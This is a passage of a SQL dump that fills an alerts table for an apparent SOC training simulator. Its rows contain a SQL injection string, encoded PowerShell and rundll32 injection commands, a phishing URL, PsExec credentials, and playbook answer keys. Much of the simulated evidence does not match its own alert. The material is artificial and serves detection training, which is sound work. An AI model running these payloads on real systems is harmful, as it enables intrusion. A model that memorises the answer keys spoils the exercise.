1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"psmith\\\",\\\"hostname\\\":\\\"DESKTOP02\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.921Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"psmith\\\",\\\"hostname\\\":\\\"DESKTOP02\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.921Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"psmith\\\",\\\"hostname\\\":\\\"DESKTOP02\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.921Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"psmith\\\",\\\"hostname\\\":\\\"DESKTOP02\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1392, 'SQL Injection Attempt on Internal Web Server', 'high', 'Wazuh', 'An SQL injection attempt was detected targeting the internal web server.', 'Web Attack', 'T1190', 0, 'investigating', 56, '{\"timestamp\":\"2026-03-02T14:10:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.200\",\"dst_ip\":\"192.168.5.20\",\"username\":\"webuser\",\"hostname\":\"WEB-SERVER01\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-03-02 03:09:19', '2026-03-03 15:52:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.5.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal web server\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload and external IP confirm a true positive SQL injection attempt.\"}', 'Novice', 'SIEM', 1, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.922Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.5.20\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.922Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.5.20\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.922Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.5.20\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.922Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.5.20\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"request_body\\\":\\\"\' 
OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.922Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.5.20\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1393, 'Suspicious Command Execution on Workstation', 'medium', 'Elastic SIEM', 'A suspicious command was executed on a user workstation, potentially indicating malicious activity.', 'Command Execution', 'T1059', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T15:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.6.15\",\"dst_ip\":\"\",\"username\":\"klee\",\"hostname\":\"WORKSTATION03\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"Write-Host \'Hello World\'\\\"\"}', '2026-03-02 03:09:19', '2026-03-09 02:43:36', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"Write-Host \'Hello World\'\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Common administrative command\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.6.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"klee\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Regular user account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"command_execution\",\"analysis_notes\":\"The command executed is a common administrative task, indicating a false positive.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"klee\\\",\\\"hostname\\\":\\\"WORKSTATION03\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"Write-Host \'Hello World\'\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"klee\\\",\\\"hostname\\\":\\\"WORKSTATION03\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"Write-Host \'Hello World\'\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"klee\\\",\\\"hostname\\\":\\\"WORKSTATION03\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"Write-Host \'Hello World\'\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"klee\\\",\\\"hostname\\\":\\\"WORKSTATION03\\\",\\\"command_line\\\":\\\"powershell.exe 
-NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"Write-Host \'Hello World\'\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"klee\\\",\\\"hostname\\\":\\\"WORKSTATION03\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"Write-Host \'Hello World\'\\\\\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1394, 'Failed Remote Desktop Login Attempts', 'low', 'Azure Sentinel', 'Multiple failed remote desktop login attempts from an external IP with no known malicious activity.', 'Brute Force', 'T1110', 0, 'investigating', 258, '{\"timestamp\":\"2026-03-02T16:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.67\",\"dst_ip\":\"192.168.7.30\",\"username\":\"administrator\",\"hostname\":\"SERVER02\",\"failed_attempts\":8}', '2026-03-02 03:09:19', '2026-03-06 15:22:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this IP\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.7.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is not associated with malicious activity, indicating a false positive.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.7.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"SERVER02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-02T13:54:06.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.7.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"SERVER02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-02T13:53:06.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.7.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"SERVER02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-02T13:52:06.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.7.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"SERVER02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-02T13:51:06.926Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.7.30\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"SERVER02\\\",\\\"failed_attempts\\\":8}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1395, 'Ransomware Detected: LockBit 3.0 Process Injection on EHR Server', 'critical', 'CrowdStrike', 'LockBit 3.0 ransomware detected via process injection technique on the Electronic Health Records (EHR) server, targeting sensitive patient data.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T10:12:34Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.50.2\",\"username\":\"ehr_admin\",\"hostname\":\"EHR-SERVER01\",\"command_line\":\"rundll32.exe inject.dll,EntryPoint\"}', '2026-03-02 03:10:27', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 347 times for ransomware activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.50.2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal EHR server\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"rundll32.exe inject.dll,EntryPoint\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Identified as LockBit 3.0 ransomware process injection\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Confirmed process injection and malicious IP linked to LockBit 3.0 ransomware.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1396, 'Phishing Attempt: Malicious URL in Email', 'high', 'Proofpoint', 'Phishing email received with a malicious URL targeting healthcare professionals to steal credentials.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T08:45:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"204.0.114.55\",\"dst_ip\":\"192.168.1.25\",\"username\":\"john.doe@hospital.org\",\"hostname\":\"MAIL-SERVER01\",\"email_sender\":\"support@fakesupport.com\",\"url\":\"http://malicious-link.com/login\"}', '2026-03-02 03:10:27', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"204.0.114.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"support@fakesupport.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email domain known for phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts phishing landing page\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Phishing email with malicious URL confirmed; sender and URL flagged in multiple databases.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt: Malicious URL in Email\",\"date\":\"2026-03-02T13:55:06.933Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1397, 'Suspicious Internal Network Traffic', 'medium', 'Sysmon', 'Detected unusual internal network traffic suggesting potential lateral movement using PsExec.', 'Lateral Movement', 'T1077', 0, 'New', NULL, '{\"timestamp\":\"2026-03-02T09:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"192.168.2.15\",\"username\":\"network_admin\",\"hostname\":\"ADMIN-PC01\",\"command_line\":\"PsExec.exe \\\\\\\\192.168.2.15 -u admin -p password\"}', '2026-03-02 03:10:27', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal admin workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\192.168.2.15 -u admin -p password\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate use of PsExec for system management\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Traffic resulted from legitimate administrative tasks; no indicators of compromise.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"ADMIN-PC01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.2.15 -u admin -p password\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"ADMIN-PC01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.2.15 -u admin -p password\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"ADMIN-PC01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.2.15 -u admin -p password\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"ADMIN-PC01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.2.15 -u admin -p 
password\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.934Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"network_admin\\\",\\\"hostname\\\":\\\"ADMIN-PC01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.2.15 -u admin -p password\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1398, 'Unauthorized Access to AWS S3 Bucket Detected', 'high', 'AWS GuardDuty', 'A foreign IP address was detected attempting to access an unsecured S3 bucket containing sensitive healthcare data. This activity may indicate a data exfiltration attempt.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T10:05:23Z\",\"event_type\":\"web_request\",\"src_ip\":\"54.172.98.101\",\"dst_ip\":\"192.168.1.25\",\"username\":\"john.doe\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-bucket/records\",\"command_line\":\"\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"54.172.98.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"s3.amazonaws.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Potential data exfiltration vector\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The foreign IP attempting to access sensitive data without authorization suggests a data exfiltration attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.935Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:05:23Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"54.172.98.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"GET 
